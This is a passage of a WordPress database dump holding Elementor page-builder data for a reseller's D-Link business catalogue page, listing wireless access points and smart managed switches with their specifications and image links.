for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7290,3370,'_elementor_version','2.5.14'),(7291,3370,'_elementor_edit_mode','builder'),(7294,3371,'_wp_page_template','template-fullwidth.php'),(7295,3371,'_elementor_template_type','post');
INSERT INTO `wpdp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (7296,3371,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"240\",\"right\":\"240\",\"bottom\":\"240\",\"left\":\"240\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"81\",\"right\":\"81\",\"bottom\":\"81\",\"left\":\"81\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G 